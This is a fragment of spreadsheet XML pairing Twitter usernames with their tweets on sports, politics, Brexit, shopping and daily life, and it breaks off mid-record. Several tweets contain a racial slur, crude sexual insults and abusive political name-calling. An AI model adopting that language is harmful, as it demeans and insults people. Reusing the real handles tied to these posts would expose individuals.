  <si>
    <t>diablofan121</t>
  </si>
  <si>
    <t>@charlieINTEL I do please :( I’ve been sick and haven’t been able to preorder yet 😔</t>
  </si>
  <si>
    <t>_Lizzie_Jean_</t>
  </si>
  <si>
    <t>@bellejungkook 😭😭😭 I'm just gonna cry and starve</t>
  </si>
  <si>
    <t>ariichN7</t>
  </si>
  <si>
    <t>@afneil Are you saying that Parliament *did* ignore the vote? How does that tally with it overwhelmingly voting to trigger Article 50?</t>
  </si>
  <si>
    <t>gilmcdowell</t>
  </si>
  <si>
    <t>@JChambo98 @Dismal_daveR @Janspics26 @paulmasonnews @BorisJohnson And what mental gymnastics do you have to go through to arrive at that conclusion?</t>
  </si>
  <si>
    <t>rozaithadon</t>
  </si>
  <si>
    <t>Bearded niggas on twitter be the biggest whores. Yeah I said it 😂</t>
  </si>
  <si>
    <t>Ashleyy_Winning</t>
  </si>
  <si>
    <t>Happy birthday to the king of KC, @PatrickMahomes ❤️💛 https://t.co/2SvhTYbcd9</t>
  </si>
  <si>
    <t>roguesquadkat</t>
  </si>
  <si>
    <t>@ArlequinnB @Thomwade No it’s pretty on point with the man who struggles with the dark side</t>
  </si>
  <si>
    <t>sdapcd</t>
  </si>
  <si>
    <t>To help keep the air clean be proactive; know what your carbon footprint is. https://t.co/7AZbhhn3TP https://t.co/8ScJm2GbTb</t>
  </si>
  <si>
    <t>amy_dicosola</t>
  </si>
  <si>
    <t>@hightower511 @CHIRLA @MoveOn Most seem to be always doing fine? Are you serious?!....the level of stupidity with you is strong</t>
  </si>
  <si>
    <t>BalanCohen</t>
  </si>
  <si>
    <t>@PatrickConwayMD in the works: affordability index. By this metric, 25% of population they studied is unaffordable #healthspending</t>
  </si>
  <si>
    <t>Pete_Escalante</t>
  </si>
  <si>
    <t>@RepJerryNadler This is without a doubt the most INEPT group of DEMOCRATS ever assembled in our Congress. And one thing's for certain, the Sh!t definitely runs Down hill and washes over their Constituents. #Trump2020Landslide</t>
  </si>
  <si>
    <t>sydzillaaa</t>
  </si>
  <si>
    <t>I keep my opinion to myself on social media because don’t nobody really care about what I have to say. And I’m not finna argue with anybody because idc what you have to say either 🤷🏾‍♀️</t>
  </si>
  <si>
    <t>WandaGapeach165</t>
  </si>
  <si>
    <t>This closet is awesome! Shop goldengood's latest listings on @poshmarkapp. Join with code GAPEACH165 for a $10 credit! https://t.co/1FrQC9WvHP #poshmark</t>
  </si>
  <si>
    <t>Mahagony</t>
  </si>
  <si>
    <t>🚨🚨#New #Mixtape 🔥🔥💨 👑#DantannaSVegas "Long Live The Dealer" Vol. 2 Follow @dantamna_s_vegas #PressPlay 🎧🔊🎚📻 #independent #FamilyAffiliated #rap #unsigned #music #nowplaying #bars #lyricist #lyrics #garronte… https://t.co/dvUJefupC0</t>
  </si>
  <si>
    <t>lilt0rtillaboi</t>
  </si>
  <si>
    <t>@Roy_Rob_ Can I just go over and see?</t>
  </si>
  <si>
    <t>Biglarry1954</t>
  </si>
  <si>
    <t>@jimmygreene Now I AM Going to Sell All of my Colt’s n Boycotting Colt I hope Others Retweet this n Join Me in this Movement they Are Kneeling to The Democrats!!!!!!!!!!!!!</t>
  </si>
  <si>
    <t>crxigzzz</t>
  </si>
  <si>
    <t>I’m about to leave the house (just to walk to my Nan’s) in joggers and I’ve never felt more chavvy</t>
  </si>
  <si>
    <t>MikeShor</t>
  </si>
  <si>
    <t>@terrycowgill Apparently states should have rights to trample on women, not companies. Duh.</t>
  </si>
  <si>
    <t>fezziwig2019</t>
  </si>
  <si>
    <t>$SHOP I love the sound of drone propellers in the morning - it says “Fulfillment.” https://t.co/TMpSX3s8cZ</t>
  </si>
  <si>
    <t>TheUHMethod</t>
  </si>
  <si>
    <t>"Poetry is the rhythmical creation of beauty in words." -Edgar Allan Poe</t>
  </si>
  <si>
    <t>Irlandia</t>
  </si>
  <si>
    <t>This company wants to deal with space junk by… sending up more space junk "There are roughly 130 million pieces of space debris orbiting Earth’s atmosphere." https://t.co/dS9JaoN4eY</t>
  </si>
  <si>
    <t>NoMercyBalenci</t>
  </si>
  <si>
    <t>@MarioHTXX So what the method??</t>
  </si>
  <si>
    <t>runswithcoffee</t>
  </si>
  <si>
    <t>@nprpolitics It’s really sad when one is so stubborn one can’t even admit a simple error, but covers it up with fraud. “Sorry, didn’t mean Alabama. An honest mistake.” Easy... Sorry, I meant “wouldn’t”, Re: Helsinki. Sorry, those 22 women claiming sexual assault are lying...not me. Uh huh.</t>
  </si>
  <si>
    <t>MattMcClain3</t>
  </si>
  <si>
    <t>This is coming from a Sports Anchor... IMAGINE thinking that a football game is more important that the safety of people. I understand there is frustration about possible split screen usage, but when in doubt... we stand frimly on the side of alerting our audience.</t>
  </si>
  <si>
    <t>linseytweets</t>
  </si>
  <si>
    <t>@Captsully I introduced my 16 year old daughter to the meaning of human factors ..... We watched #Scully</t>
  </si>
  <si>
    <t>Court_lynn99</t>
  </si>
  <si>
    <t>And to top it off, they literally only carry an XS and S in the shirt I would get. Aight cool 😑</t>
  </si>
  <si>
    <t>j_parker6</t>
  </si>
  <si>
    <t>We pick our friends and then life sorts them out.</t>
  </si>
  <si>
    <t>dreamrampage</t>
  </si>
  <si>
    <t>I'm not saying there isn't any inherent value in a liberal arts education, but shills like this specifically argue that such a degree will make you valuable to employers.</t>
  </si>
  <si>
    <t>golddiggin_bri</t>
  </si>
  <si>
    <t>Whenever I see pho I immediately crave it ... and well.. now I want pho :/</t>
  </si>
  <si>
    <t>Hyper68</t>
  </si>
  <si>
    <t>@Imazingtweet Says the div 8 player &lt;3</t>
  </si>
  <si>
    <t>GraemeCrews</t>
  </si>
  <si>
    <t>@dannybarefoot Thx for the new phone background</t>
  </si>
  <si>
    <t>stormytussey</t>
  </si>
  <si>
    <t>The Science of Branding: How Brands Make Us ‘Think Different’ by @joshuawayne3616 https://t.co/5jtYWwRNsN</t>
  </si>
  <si>
    <t>terrorEXEGaming</t>
  </si>
  <si>
    <t>Borderlands 3 stream, come tell me your favorite class and why! https://t.co/zL13ewXsZW #FacebookPage #streaming #Borderlands #borderlands3</t>
  </si>
  <si>
    <t>JBOfromSuwanee</t>
  </si>
  <si>
    <t>@DrShayPhD They have to write the manifesto and folks in the government are out for Labor Day.</t>
  </si>
  <si>
    <t>davidmackau</t>
  </si>
  <si>
    <t>@DiscreetLatino strap yourself in and feel the Gs</t>
  </si>
  <si>
    <t>clydebankpost</t>
  </si>
  <si>
    <t>"She is truly an inspiration to us all." https://t.co/KJpp7kyaS5</t>
  </si>
  <si>
    <t>Chelynnn</t>
  </si>
  <si>
    <t>“what’s up with you beautiful” SUCK MY DICK</t>
  </si>
  <si>
    <t>BStillion24</t>
  </si>
  <si>
    <t>rlly want a polar pop but my cars on E and it doesn’t direct deposit until after midnight 😭</t>
  </si>
  <si>
    <t>kktvSydney</t>
  </si>
  <si>
    <t>Here comes the sun... #COwx https://t.co/Q2cOHzMm7F</t>
  </si>
  <si>
    <t>ebras14</t>
  </si>
  <si>
    <t>I like to look back at my past decisions and realize how stupid I really am.</t>
  </si>
  <si>
    <t>BruceWolfChi</t>
  </si>
  <si>
    <t>Baseball is so boring no one can remember the count.</t>
  </si>
  <si>
    <t>mwitte7612</t>
  </si>
  <si>
    <t>A toast to impeachment https://t.co/UWW5iwGCqb</t>
  </si>
  <si>
    <t>HOLDING PATTERN ALERT : At time Sun Sep 15 23:05:16 2019 #AVA9418 was likely to be holding at FL83 0nm from DR Delta_Romeo_NDB_CO near El Hato, Funza, Cundinamarca, 250020, Colombia #AvGeek #holding https://t.co/i79HAx3Gdq https://t.co/S9Mw5gJOfM</t>
  </si>
  <si>
    <t>hoebertovittar</t>
  </si>
  <si>
    <t>@kevinsitorozco They’re used to it that’s why lol 😂 earthquakes happen all the time there</t>
  </si>
  <si>
    <t>nicoleperlroth</t>
  </si>
  <si>
    <t>@ayeshacurry Hi! Please follow for DM : )</t>
  </si>
  <si>
    <t>hitsdingers10</t>
  </si>
  <si>
    <t>@ScottPresler @realDonaldTrump So much for being legal https://t.co/jcUkhJmNnl</t>
  </si>
  <si>
    <t>ChinaInstitute_</t>
  </si>
  <si>
    <t>Our events schedule for Fall 2019 is here! Check out our First Annual Food &amp; Ideas Festival, upcoming public programs, language &amp; music classes, and much more on our website! We can't wait to see you at China Institute! #CIFestival #futurespeakschinese https://t.co/QuvAKluXNw https://t.co/yiPtnw0EuC</t>
  </si>
  <si>
    <t>goth_gunnywolf</t>
  </si>
  <si>
    <t>@RudbeckiaSun Stensland is sobbing. He just wanted to cook breakfast for Clyde to celebrate them officially living together, but he's gone and burnt the bacon. He's about to scrape the contents of the pan into the garbage can when Clyde walks in. "That smells great, babe!"</t>
  </si>
  <si>
    <t>wmmsffa</t>
  </si>
  <si>
    <t>Excited to announce the 2019-2020 FFA Officer Team! First officer meeting is Thursday (9/26) at 3:30pm. The meeting will last 45 minutes. @WestMillbrook @WMillbrookCTE https://t.co/yePiwc2Zng</t>
  </si>
  <si>
    <t>OklahomaPWP</t>
  </si>
  <si>
    <t>Congratulations to 2021 SF Nykale Cramer from Millwood HS on receiving an offer from Oklahoma Baptist University! @OBU_WBBall @CASIBAYS @LindseyMyers87 @kale_janae https://t.co/YhvB8cTpGh</t>
  </si>
  <si>
    <t>ENDS_Music</t>
  </si>
  <si>
    <t>haven you saw Scarface: J. Prince Was Raised by Wolves and I Was Raised by Him (Flashback) #CelebrityTalk #HipHopInterview #VLADTV here at https://t.co/FfPKYVBOmE https://t.co/WWoCayQlkz</t>
  </si>
  <si>
    <t>Logiedogiehogie</t>
  </si>
  <si>
    <t>Y’all between classes, research, and life I don’t feel like I can ever get a moment to breathe someone HELP</t>
  </si>
  <si>
    <t>Hootsuite_Help</t>
  </si>
  <si>
    <t>@gwackr Hi there! Thanks for reaching Hootsuite! Would be glad to help, could you send us a DM alongside the e-mail associated with your account? Thanks! ^AX</t>
  </si>
  <si>
    <t>Detcookieman74</t>
  </si>
  <si>
    <t>@RealSkipBayless And quietly Rogers is a regressing QB he will have 2000 yds + but they will be in between the Red Zones not in them... Shannon will blame the players around him but watch it's not the players or sheme it's Rogers,he can't keep up...mark my words too be cont,it's only Game 1..</t>
  </si>
  <si>
    <t>_adurnelly</t>
  </si>
  <si>
    <t>@jesssosby @brittanyrricci also us when we were told to meet in his “office”</t>
  </si>
  <si>
    <t>vantagemusicuk1</t>
  </si>
  <si>
    <t>@Hart2H @wunamon @DottieW08485010 @RealCandaceO Yes, in the UK you can join the army at 15 and three quarters. And I don't care how old or young someone is, a cunt is a cunt.</t>
  </si>
  <si>
    <t>PoliticsReid</t>
  </si>
  <si>
    <t>A common thread through the 3 governor races up this year: Republicans are nationalizing the debates, while Dems try to pull a Gretchen Whitmer and focus on local issues. https://t.co/FAOseDsvu0</t>
  </si>
  <si>
    <t>DaveASimone</t>
  </si>
  <si>
    <t>@TEE1031 @wwylles Haters gotta hate. Who is this vile beast? She sure knows how to have a good time... in the middle of the day. To what does she attribute this, you may ask? Likely, an unhealthy combination of alcohol before breakfast &amp; double dosing meds. Kids, stay in school. #wwjd https://t.co/GExunDeFQE</t>
  </si>
  <si>
    <t>TribalistSF</t>
  </si>
  <si>
    <t>@itsdejaayh0 Hi! Are you looking for song recommendations? We've taken all the top music lists and put them in one place. Hope you find something to listen to! https://t.co/3nFBUYnfTX</t>
  </si>
  <si>
    <t>AndersHanson</t>
  </si>
  <si>
    <t>@LutheBlue @Gareth_E_Slater @JasonHolyhead I was just thinking how much this sounded like my school and then remembered that (a) it was my school and b) Lucy and I were there at the same time</t>
  </si>
  <si>
    <t>GraceLancers</t>
  </si>
  <si>
    <t>UPDATE: Matches at home today have been canceled. Two big matches for Grace Tennis tomorrow at IWU!</t>
  </si>
  <si>
    <t>AustinRockwood3</t>
  </si>
  <si>
    <t>@thenameis_steve Soon. Keep your head up love ❤️</t>
  </si>
  <si>
    <t>Bookgirl96</t>
  </si>
  <si>
    <t>@gabrielroth I’m definitely interested to see what Shiv does next bc she essentially got played.</t>
  </si>
  <si>
    <t>NurseKarr</t>
  </si>
  <si>
    <t>Never let the bullshit blind you from the blessings.💕</t>
  </si>
  <si>
    <t>PlaidHeart</t>
  </si>
  <si>
    <t>@Hugoreloaded Thanks for sharing even though it was tough 💞</t>
  </si>
  <si>
    <t>BradMit94383370</t>
  </si>
  <si>
    <t>@GentlemanCotton @BlueGirlsRule @ChrisMurphyCT So what is a firearm designed to do other than eject a projectile at high-speeds?</t>
  </si>
  <si>
    <t>ohsoyouhope</t>
  </si>
  <si>
    <t>Today’s Lunch: Japanese cuisine 😍😍🇯🇵 Broiled pike fish w/ miso soup (left) and salmon avocado rice bowl (right) #ThankYouMama https://t.co/CaSk5gB46k</t>
  </si>
  <si>
    <t>BourgeoisViews</t>
  </si>
  <si>
    <t>@DavidHuddo @Michael80282175 @Jules1602xx @Angi80839247 @Cerb32 @AnnieIrish68 @Natalie01016290 @CruftMs @Esjabe1 @janamb @DavidFerguson21 @Babs108164110 @NewsAnagrams @scamhunter486 @NoLies4u2day @nessiestressy @NancyParks8 @alfibab3 @LoverandomIeigh @Ntown1976Nick @Munchki53720423 @ChristineSout15 @carmarsutra @factsonly10x @AnniL059 @SteMotson @debgee9 @xxSiLverdoexx @Mills50J @YohannaVermeer @MeganBland12 @MrDelorean2 @Melsmit15864245 @QueenDPortugal @chapclan Matt Oldfield found the door already partially open. Since he didn't even stick his head into the room looking toward Madeleine, he couldn't have seen her but only the end of her bed.</t>
  </si>
  <si>
    <t>tezjones29</t>
  </si>
  <si>
    <t>The nap I just had was everything hear?!</t>
  </si>
  <si>
    <t>CoachTQuick</t>
  </si>
  <si>
    <t>@MashElite This Snapchat story is one of the worst things to ever happen in our field</t>
  </si>
  <si>
    <t>caspmax</t>
  </si>
  <si>
    <t>The Washington Post: The more ominous part of the Trump Sharpie incident https://t.co/OS4rBDgL0j</t>
  </si>
  <si>
    <t>rob_bonz</t>
  </si>
  <si>
    <t>@spdrvrs To bad it had words, bad jokes and a mindless screenplay, otherwise agreed. #thelastjedi #starwars</t>
  </si>
  <si>
    <t>Annelizab</t>
  </si>
  <si>
    <t>@JamesCleverly Lack of leadership? You looking in the mirror, been on the laughing gas, or totally lost it, James?</t>
  </si>
  <si>
    <t>Chongleatherma</t>
  </si>
  <si>
    <t>Synopsis of Fortnite: Pro Guide 100% Unofficial: Build, Battle and be the Best &gt;&gt; https://t.co/awYVoq49Fv</t>
  </si>
  <si>
    <t>Koukifolf</t>
  </si>
  <si>
    <t>@Rukario71 Good luck my friend and goodnight *hugs you warmly*</t>
  </si>
  <si>
    <t>17MillionRising</t>
  </si>
  <si>
    <t>@Tees4Europe @snb19692 The EU is systemically racist It’s immigration system favours white people and marginalises people of colour—should be called “freedom of movement if white people” It’s trade barriers strangle economic development in the Global South Real progressives vote leave #brexit</t>
  </si>
  <si>
    <t>dvrris</t>
  </si>
  <si>
    <t>thinking about the shrimp that fried this rice</t>
  </si>
  <si>
    <t>ATUCareers</t>
  </si>
  <si>
    <t>Today is @ArcBestCorp takeover day! The ArcBest team will be posting to the ATU Careers Twitter, Facebook and Instagram pages and telling you all about careers at ArcBest. So stay tuned, and keep checking our page throughout the day! https://t.co/5uGxtiqtk9</t>
  </si>
  <si>
    <t>radioswithguts</t>
  </si>
  <si>
    <t>Should people with mental health conditions be drugged to stand trial? https://t.co/n9ss9HQRNg</t>
  </si>
  <si>
    <t>Consiglie1Chris</t>
  </si>
  <si>
    <t>@tanerelle Tennessee Whiskey- Chris Stapleton , Death of a Bachelor-Panic At The Disco , Love you too much- Lucky Daye, Tadow - Masego,</t>
  </si>
  <si>
    <t>hennessyyham</t>
  </si>
  <si>
    <t>The problem is everyone wants to be Curry, nobody wanna be Draymond. Yeah Curry the star, but Draymond the glue.</t>
  </si>
  <si>
    <t>Ubisoft_UK</t>
  </si>
  <si>
    <t>@AlignedManatee Ghosts, the OPEN BETA is live! Get your squad together and PLAY FOR FREE until Sunday! Opt-out by replying using #nobeta https://t.co/VGtuxlgnHk</t>
  </si>
  <si>
    <t>FurbySquawk</t>
  </si>
  <si>
    <t>@AarontheWise @Sasori_113 @missnotyou @MatthewBouman1 @orcatwar98 @brutalpuncher1 And do a YouTube-style Rap Battle.</t>
  </si>
  <si>
    <t>PMOsborneWriter</t>
  </si>
  <si>
    <t>I apologise that I've not been quite so active in my tweets of late but feeling burnt out. I'm trying though but if I haven't got around to RTing you, please don't take it personal. Hopefully I'll be more active in the next week or so. @CHINDIAuthors #IARTG #WednesdayWisdom https://t.co/aHRGD34L8N</t>
  </si>
  <si>
    <t>NidhiSubs</t>
  </si>
  <si>
    <t>It's hard to publish and hard to fund studies exploring questions critical of fluoride, scientists told me. The public debate is fierce, and views among their peers are entrenched https://t.co/ndEcZz4nQ3</t>
  </si>
  <si>
    <t>agedandhomecare</t>
  </si>
  <si>
    <t>Why Daily Pay Is Home Care’s ‘Flavor of the Day’: https://t.co/HlRUQCHBPw #agedcare #homecare #seniorscare</t>
  </si>
  <si>
    <t>Lilrichyy87</t>
  </si>
  <si>
    <t>reminding me that my right hand’s gone and now i’m fallin apart without it.</t>
  </si>
  <si>
    <t>WaffleLYNN</t>
  </si>
  <si>
    <t>@AllisonZwicker sure did just lay on the floor after this. Wine time a go?😩</t>
  </si>
  <si>
    <t>EvokeMadness</t>
  </si>
  <si>
    <t>@belickim So happy for you!</t>
  </si>
  <si>
    <t>FreeLibrary</t>
  </si>
  <si>
    <t>Have you read the #1619Project yet? If you've gained a new perspective on slavery’s legacy and want to keep learning, the Free Library has three great resources for you to explore: https://t.co/w0YRdGof9x https://t.co/1oVoozSy79</t>
  </si>
  <si>
    <t>KRBowie</t>
  </si>
  <si>
    <t>@piersmorgan Never watched politics go so crazy; there's a lot more still to come up to Oct 31st.</t>
  </si>
  <si>
    <t>marknew91</t>
  </si>
  <si>
    <t>@Defeat_Trump2 @JMo2221 I agree. I also think he says, "Assign two legal guys to figure out if I can ..." whatever. Have Comey/Mueller/Biden arrested, or stay in office if I lose, or have Obama's executive order declared illegal. Etc.</t>
  </si>
  <si>
    <t>TheRealJessCRU</t>
  </si>
  <si>
    <t>And do we not care where and what taxpayer money is spent on? Because I feel like people do. They just don't care enough to do something about it. Whether ur kid is in Public school or not, ur still paying for the Public education those other kids who arent yours are getting.</t>
  </si>
  <si>
    <t>thejrolled</t>
  </si>
  <si>
    <t>on some corny shit her music is so special to me. one of the few ppl that can bring emotions to the surface for me with just sound it’s like super therapeutic to listen to her. ugh i love her so much. I can’t wait for the album!!</t>
  </si>
  <si>
    <t>fryleigh1974</t>
  </si>
  <si>
    <t>@cadwwales @Arts_Wales_ @BBCWales https://t.co/3tcIjpTB4j @hef4caerphilly @WayneDavid_MP Shocking neglect of gravechard Thanks for feedback guys👍 https://t.co/3Cf3tyd7hf</t>
  </si>
  <si>
    <t>lixer18</t>
  </si>
  <si>
    <t>@Kirchyy @JakeBlissful @Exurvia @ExotikGuns @CQuents The dude is a killer with anything he uses. He cracked</t>
  </si>
  <si>
    <t>Q_ssbu</t>
  </si>
  <si>
    <t>@RyanDCB why do you start getting knocked back from half way across the stage when I counter it?</t>
  </si>
  <si>
    <t>Leicester_News</t>
  </si>
  <si>
    <t>@ukManojLad Hi, parking at the train station is not with in our jurisdiction. You would have to contact the station directly. @EastMidRailway</t>
  </si>
  <si>
    <t>Hubjus</t>
  </si>
  <si>
    <t>@Alan77799514069 @KatWebheart @CBSNews For fuck sake. Please google. Country is so beyond corrupt and furthest thing from real socialism. This is a Fox News republican false information talking point.</t>
  </si>
  <si>
    <t>frankieisnice</t>
  </si>
  <si>
    <t>@DreySox Lmfaooooo 😂😂😂 fohhhhh don’t disrespect the star like that</t>
  </si>
  <si>
    <t>aaron_mcgee34</t>
  </si>
  <si>
    <t>I wonder when work is going to get any better been here almost 4 years and just gets worse and worse everyday😶😑</t>
  </si>
  <si>
    <t>daylyt100</t>
  </si>
  <si>
    <t>@ScrumQueens Just a few postings of complete squads not selection for Glendale.</t>
  </si>
  <si>
    <t>GPrader23</t>
  </si>
  <si>
    <t>@EASPORTS_MUT Nerf the pass rush I’m tired of being sacked in .2 seconds with a 4 man rush</t>
  </si>
  <si>
    <t>jasmine_hashmi</t>
  </si>
  <si>
    <t>Changed to Scoob with his last name be a influence by a Song that Had Doo-Bee-Dooo. That all I got Happy Anniversary Scooby-Doo https://t.co/zwbPbDjZqO</t>
  </si>
  <si>
    <t>jlfm42</t>
  </si>
  <si>
    <t>@B52Malmet @JadedCreative Oh please yes! Bury him deep, in the ground, head first!</t>
  </si>
  <si>
    <t>vonzwisdom</t>
  </si>
  <si>
    <t>Your high spirits prompt you to be overly competitive today. T... More for Taurus https://t.co/HQyf7bcye2</t>
  </si>
  <si>
    <t>Travel_Session</t>
  </si>
  <si>
    <t>A4- Cheap tickets is the quickest way to change my mind about going someplace #PTTravel #travelingsession https://t.co/8brLmlDL4y</t>
  </si>
  <si>
    <t>waitwhatisthis_</t>
  </si>
  <si>
    <t>@siliconglen @BorisJohnson Respect the referendum!</t>
  </si>
  <si>
    <t>jennifervranes1</t>
  </si>
  <si>
    <t>Trump Accuser Drops Lawsuit After Video Seems to Contradict Her Story https://t.co/wiMro624Ri</t>
  </si>
  <si>
    <t>selffunded12</t>
  </si>
  <si>
    <t>PM Morrison gets 19 gun salute from POTUS and promises young Australian military lives in exchange for state dinner and lobster entree? #auspol</t>
  </si>
  <si>
    <t>Jacoby_Ticer</t>
  </si>
  <si>
    <t>@AllieDudley They sell Doritos at the grocery store</t>
  </si>
  <si>
    <t>SwampDrainer14</t>
  </si>
  <si>
    <t>@Jali_Cat @ChooseToBFree @UN @UnitedNationsJO @CyrilRamaphosa @realDonaldTrump @SecondLady @SecPompeo @DHSMcAleenan Omg. What the hell is happening here.</t>
  </si>
  <si>
    <t>GeekMelange</t>
  </si>
  <si>
    <t>@RevRyeBread @screwjaw If they're good I'm doomed because it's literally RIGHT NEXT to my gym 😭</t>
  </si>
  <si>
    <t>jaymfmartinx2</t>
  </si>
  <si>
    <t>All dese females the same..they be runnin the same game</t>
  </si>
  <si>
    <t>MelaJRose</t>
  </si>
  <si>
    <t>@RealJMcDonough @pjoneilNC @ParishRosy @mandylawson7 @LostPlanetPluto @lyv0n @Aaaamberr2255 @AmberGodarkly @JoshOdyssey @ziegander @Cyborg_Writer @99PercentDark @Balarush @AuthorRidge @kacethelesbian @RCKennyBooks @LMaybrooke You told me you didn't always need to be on top, John. Are you asking for tops?</t>
  </si>
  <si>
    <t>Colin00007</t>
  </si>
  <si>
    <t>@GlennBBC @nickeardleybbc @UKSupremeCourt @PurvisTweed except SC ruled that prorogation was legal and then created a new law that the length of prorogation was "unlawful" (but not illegal as it broke not existing law) and judicable - SC made no comment on PMs private advice to HM Queen - you interview some very stupid people</t>
  </si>
  <si>
    <t>realkitters</t>
  </si>
  <si>
    <t>@ToffeeTVEFC Biggest gang of pussies ever. The manager needs sacking, that’s disgraceful management of a football team.</t>
  </si>
  <si>
    <t>Zungi</t>
  </si>
  <si>
    <t>@ClarkDennisM @JPUConn @Tesla You know they had 3 cars there and that there’s no evidence to suggest when this video was taken?</t>
  </si>
  <si>
    <t>AshRoyHelps</t>
  </si>
  <si>
    <t>How To Create The Right Social Media Marketing Campaign For Your Business — with Jeff Bullas (Part 2 of 2) #businesscoaching https://t.co/sZjUOWsyrC https://t.co/LGnprNwS8x</t>
  </si>
  <si>
    <t>ronowens47</t>
  </si>
  <si>
    <t>How To Use Aromatherapy &amp; Essential Oils For Pain – Bath and Body https://t.co/4tADDHz9tL</t>
  </si>
  <si>
    <t>breaknewfb</t>
  </si>
  <si>
    <t>World Cup winners John Higgins and Stephen Maguire to meet in Six-red World Championship final https://t.co/HQKIiihdvn</t>
  </si>
  <si>
    <t>siren_48</t>
  </si>
  <si>
    <t>Easy and fun job! Message me if you're interested. We are flexible! https://t.co/Ah6cExH3h5</t>
  </si>
  <si>
    <t>LWorthySports</t>
  </si>
  <si>
    <t>Twins got a run back in the top of the second on an RBI double by Willians Astudillo. 1-1</t>
  </si>
  <si>
    <t>LDNJORDAN</t>
  </si>
  <si>
    <t>Walking home at 6am in the rain 😩 https://t.co/ibQ1Gjpurt</t>
  </si>
  <si>
    <t>IanOnTheMoon</t>
  </si>
  <si>
    <t>So I’m able to access my schools smart boards :) https://t.co/aLSLuAixXV</t>
  </si>
  <si>
    <t>ReligionTweet</t>
  </si>
  <si>
    <t>New book follows stories relating to religion, work, relationships and identity - Benzinga https://t.co/8MhMADs7bJ</t>
  </si>
  <si>
    <t>Variety</t>
  </si>
  <si>
    <t>Venice Competition Film ‘The Painted Bird’ to Be Czech Entry in Oscar Race https://t.co/rImVSh2SBI</t>
  </si>
  <si>
    <t>hollylynn1971</t>
  </si>
  <si>
    <t>👋 @crazylady249Thanks for the Follow Back!😄🇺🇸😄 #Trump2020 https://t.co/PHjW3quW0m</t>
  </si>
  <si>
    <t>jsdnutrition</t>
  </si>
  <si>
    <t>Coming to the end of a competitive season where you’ve never quite reached the performance you hoped for or had too much time out due to injury? Relative Energy Deficiency (#RED-S) might be part of the explanation. https://t.co/HMoVTYrkUQ</t>
  </si>
  <si>
    <t>SecretAura</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: RESTOCKED! Turtle Necklace Magnifying Glass 30”. https://t.co/DCConaYZno via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>MarkConwayUK</t>
  </si>
  <si>
    <t>How to Connect Your People to Purpose and Why It’s Vital https://t.co/NLLAIWdyll @thrive https://t.co/uFeHBZqoPh</t>
  </si>
  <si>
    <t>dawndevineny</t>
  </si>
  <si>
    <t>@realDonaldTrump Sounds like a setup of some sort. DUMOCRATS are stupid and disgraceful 😡</t>
  </si>
  <si>
    <t>Scoobie29068878</t>
  </si>
  <si>
    <t>@DavidWaddell5 @tonya_madison Mitt Romney is a libtard in disguise, just like the late John McCain.</t>
  </si>
  <si>
    <t>dhidecnn</t>
  </si>
  <si>
    <t>@LouisPeitzman Justin Bieber-@donlemon; unsure what to make of this</t>
  </si>
  <si>
    <t>AdamGardner1984</t>
  </si>
  <si>
    <t>Count me in the group of people who picked up Hardman but didn’t start him 🤢</t>
  </si>
  <si>
    <t>Ensorcelled23</t>
  </si>
  <si>
    <t>@ianbremmer Bizarro World, other side of the Looking Glass, dreamland, or I’m just plain crazy. Any of those descriptors fit this weird, formerly inconceivable environment.</t>
  </si>
  <si>
    <t>jbadomics</t>
  </si>
  <si>
    <t>@ericgarland We’re coming for your borscht-stained Senate seat, traitor.</t>
  </si>
  <si>
    <t>NeuroRebel</t>
  </si>
  <si>
    <t>#ActuallyAutistic #AskingAutistics who are successfully employed - what would make employment impossible for you? #AutisticsWorking</t>
  </si>
  <si>
    <t>PortlandPolice</t>
  </si>
  <si>
    <t>#OpenData Dashboard: Use our Dispatched Calls Dashboard to discover the types of calls officers are responding to in your neighborhood. https://t.co/GlDxNkkDmp https://t.co/PKpKSjrqgR</t>
  </si>
  <si>
    <t>Juttastrachans</t>
  </si>
  <si>
    <t>[Download] PDF A courageous maiden for the Earl (Regency Tales Book 18) =&gt; https://t.co/3f0JA2uVsc</t>
  </si>
  <si>
    <t>mobiddiction</t>
  </si>
  <si>
    <t>Your Saturday morning read: "It's all about constant review and revision and recognising we do evolve as a society and hopefully we evolve to becoming morally better." #AI #ethicaltech #workTHINKplay #techthoughts https://t.co/H58Z5Imt4t</t>
  </si>
  <si>
    <t>colingregg</t>
  </si>
  <si>
    <t>@theronster Glad to hear you're both okay. Horrible experience.</t>
  </si>
  <si>
    <t>Professor_Tilt</t>
  </si>
  <si>
    <t>After being sleep deprived and unlocking characters on my own I now have personal beef with the Yoshi ai, that mfer is coded differently I swear</t>
  </si>
  <si>
    <t>bronco_houston</t>
  </si>
  <si>
    <t>5:59 left in the first, Bears punch it in from a couple yards out and add the Extra point to make 7-7.</t>
  </si>
  <si>
    <t>MackMane89</t>
  </si>
  <si>
    <t>@Winnesota_SZN @LamarHeisman @Lj_era8 Literally they rated xavier top 5 in the pre season</t>
  </si>
  <si>
    <t>VdotL</t>
  </si>
  <si>
    <t>@cpenn4thewin Home run in the second quarter I’ll take it lol</t>
  </si>
  <si>
    <t>adamwjohnson</t>
  </si>
  <si>
    <t>To be a millionaire elite-celeb that pretends to enjoy a Popeye’s sandwich..</t>
  </si>
  <si>
    <t>ashlietoon</t>
  </si>
  <si>
    <t>PDF Download Free The Career Code: Must-Know Rules for a Strategic, Stylish, and Self-Made Career =&gt; https://t.co/H8ChimvObH</t>
  </si>
  <si>
    <t>jdboutpaper</t>
  </si>
  <si>
    <t>@92FlorenceAve If the roles were reversed you’d be saying the same shit if that happened to the bears but cook on</t>
  </si>
  <si>
    <t>AnthonyDelucV</t>
  </si>
  <si>
    <t>@GraysonDolan Walking in public in a full face of makeup perhaps? Unless you’ve done that and I’ve missed it</t>
  </si>
  <si>
    <t>Truthseaker10</t>
  </si>
  <si>
    <t>@TrueRepublics @realDonaldTrump @stephenjus So how will you convince the people how will you get the word out the entire system is corrupt and evil</t>
  </si>
  <si>
    <t>AlexisHappi93</t>
  </si>
  <si>
    <t>If you’re reading this now I just want to tell you that it’s all gonna be alright in the end. Just breathe in and let go...stay Happi🍃 @ Woodstock, New York https://t.co/xNdk4XU8r2</t>
  </si>
  <si>
    <t>kellym1021</t>
  </si>
  <si>
    <t>#MEDITECHers catching up at #MUNCONF19 @MEDITECH @MEDITECH_UK @GUSTOS_REST https://t.co/PrV4GytBmy</t>
  </si>
  <si>
    <t>Bethyo</t>
  </si>
  <si>
